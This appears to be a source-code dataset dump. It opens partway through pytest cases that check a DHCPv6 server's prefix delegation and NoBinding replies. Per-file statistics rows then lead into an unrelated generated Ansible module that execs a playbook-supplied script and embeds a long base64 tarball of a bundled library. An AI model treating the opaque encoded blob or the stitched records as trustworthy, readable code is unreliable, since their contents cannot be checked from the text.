    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
    srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with IA_PD -> ADVERTISE must contain IA_PD with an IAPREFIX.
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'IA-PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    # REQUEST echoing the advertised IA_PD -> REPLY with IAPREFIX.
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    # RENEW the delegated prefix -> REPLY must again contain IAPREFIX.
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_onlyPD_renew_nobinding():
    """RENEW without a prior REQUEST must yield status-code NoBinding in IA_PD."""
    # NOTE: marked disabled; to be revisited once RFC 7550 tests are added.
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
    srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with IA_PD; server should advertise.
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'IA-PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    # RENEW straight after ADVERTISE (no REQUEST), so the server has no binding.
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    # Option 25 = IA_PD; sub-option 13 = status-code; value 3 = NoBinding.
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '13')
    srv_msg.response_check_suboption_content('Response', '13', '25', None, 'statuscode', '3')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_onlyPD_renew_nobinding_new_IA_PD():
    """RENEW with a freshly generated (unknown) IA_PD must yield NoBinding."""
    # NOTE: marked disabled; to be revisited once RFC 7550 tests are added.
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
    srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with IA_PD; server should advertise.
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'IA-PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    # Generate a brand-new IA_PD the server never saw, then RENEW with it.
    misc.test_procedure()
    srv_msg.generate_new('IA_PD')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    # Option 25 = IA_PD; sub-option 13 = status-code; value 3 = NoBinding.
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '13')
    srv_msg.response_check_suboption_content('Response', '13', '25', None, 'statuscode', '3')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
def test_prefix_delegation_IA_and_PD_renew():
    """RENEW carrying both IA_PD and IA_NA; both must be refreshed in the REPLY."""
    # NOTE(review): the "will be disabled after RFC 7550" comment here looked
    # copied from the disabled variants — this test carries no disabled mark;
    # confirm whether it should.
    misc.test_setup()
    # Server pool for IA_NA within the 3000::/64 subnet.
    srv_control.config_srv_subnet('3000::/64', '3000::ffff:ffff:1-3000::ffff:ffff:3')
    srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with IA_PD -> ADVERTISE with IA_PD/IAPREFIX (options 25/26).
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'IA-PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    # REQUEST with the saved IA_PD -> REPLY with IAPREFIX.
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_save_option('IA_PD')
    srv_msg.client_add_saved_option(None)
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    # RENEW with both the IA_PD and a new IA_NA.
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_PD')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    # REPLY must carry the prefix (25/26) and an address: option 3 = IA_NA,
    # sub-option 5 = IAADDR with the expected valid lifetime.
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '4000')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_IA_and_PD_renew_nobindig():
    """RENEW with an IA_PD the server never delegated alongside a valid IA_NA."""
    # NOTE: marked disabled; to be revisited once RFC 7550 tests are added.
    # NOTE(review): the function name has a typo ('nobindig'); renaming would
    # change the pytest test id, so it is left as-is.
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
    srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with only IA_NA -> ADVERTISE (no prefix was ever requested).
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    # RENEW adding an IA_PD the server has no binding for.
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'IA-PD')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '25')
    srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
    # Response sub-option 13 from option 25 MUST contain statuscode 3. changed after rfc7550
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '13')
    srv_msg.response_check_suboption_content('Response', '13', '3', None, 'statuscode', '3')
    references.references_check('RFC')
| 37.38326
| 93
| 0.723898
| 1,248
| 8,486
| 4.576122
| 0.084135
| 0.090352
| 0.096656
| 0.0865
| 0.941166
| 0.940816
| 0.935038
| 0.919979
| 0.909648
| 0.909648
| 0
| 0.038824
| 0.125854
| 8,486
| 226
| 94
| 37.548673
| 0.73106
| 0.05621
| 0
| 0.889535
| 0
| 0
| 0.170564
| 0.004377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| true
| 0.069767
| 0.02907
| 0
| 0.05814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
331baf1bfb03f4267878d1f322d21fa59467987c
| 73,482
|
py
|
Python
|
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# THIS IS A GENERATED FILE. DO NOT MODIFY IT
# Modify: openshift_client_python.template.py and then run rebuild_module.sh to affect this file
from __future__ import print_function
from __future__ import absolute_import
from ansible.module_utils.basic import AnsibleModule
import os
import six
import tempfile
import shutil
import tarfile
import base64
import sys
import pprint
# Allows modules to trigger errors
def error(msg, **kwargs):
    """Abort the module by raising an OpenShiftPythonException with *msg*."""
    import openshift as oc
    exc = oc.OpenShiftPythonException(msg, **kwargs)
    raise exc
def main():
    """Run the user-supplied script inside the openshift-client context.

    Reads parameters (``script``, ``timeout``, ``vars``, ``project``,
    ``changes``) from the global ``module`` — presumably an AnsibleModule
    constructed elsewhere in this generated file (not visible here; confirm)
    — and terminates via ``module.exit_json`` / ``module.fail_json``.
    """
    # Imported lazily; the bundled 'openshift' package is extracted at runtime.
    import openshift as oc
    script = module.params["script"]
    time = module.params["timeout"]
    oc.ansible.reset()
    oc.ansible.vars = module.params["vars"]
    if time is not None:
        time = int(time)  # Allow time to come in as a string
    if module.params["project"] is not None:
        oc.context.default_project = module.params["project"]
    with oc.timeout(time):
        with oc.tracking() as ct:
            try:
                # Capture stdout/stderr produced by the script so it can be
                # returned in the result instead of polluting module output.
                with oc.util.OutputCapture() as capture:
                    # SECURITY NOTE: exec of caller-provided code is this
                    # module's documented purpose; 'script' comes from the
                    # playbook author, not untrusted remote input.
                    exec(script)
                module.debug("openshift_client_python module invocation result:\n" + str(ct.get_result()))
                module.exit_json(rc=ct.get_result().status(),
                                 changed=module.params['changes'],
                                 ansible_facts=oc.ansible.new_facts,
                                 stdout=capture.out.getvalue().decode('UTF-8'),
                                 stderr=capture.err.getvalue().decode('UTF-8'),
                                 result=ct.get_result().as_dict()
                                 )
            except oc.OpenShiftPythonException as ose:
                module.debug("openshift_client_python module invocation exception: " + str(ose))
                module.debug("openshift_client_python module invocation result:\n" + str(ct.get_result()))
                # NOTE(review): the failure path ORs in oc.ansible.changed but
                # the success path above does not — confirm this asymmetry is
                # intentional.
                module.fail_json(msg=ose.msg,
                                 rc=ose.result.status(),
                                 exception_attributes=ose.attributes(),
                                 changed=module.params['changes'] or oc.ansible.changed,
                                 ansible_facts=oc.ansible.new_facts,
                                 stdout=capture.out.getvalue().decode('UTF-8'),
                                 stderr=capture.err.getvalue().decode('UTF-8'),
                                 result=ct.get_result().as_dict()
                                 )
            except KeyboardInterrupt:
                # Surface whatever tracking state exists on stderr, then
                # propagate so the interpreter exits.
                print('Received KeyboardInterrupt during module', file=sys.stderr)
                pprint.pprint(ct.get_result().as_dict(), stream=sys.stderr)
                raise
if __name__ == '__main__':
# When openshift-client-python/ansible/rebuild_module.sh is executed, it will read in this template
# and replace the following variable with a b64 encoded tarball of the openshift-client-library
# package. The client_python_extract_dir path will contain the 'openshift' package directory.
REPLACED_BY_REBUILD_MODULE = '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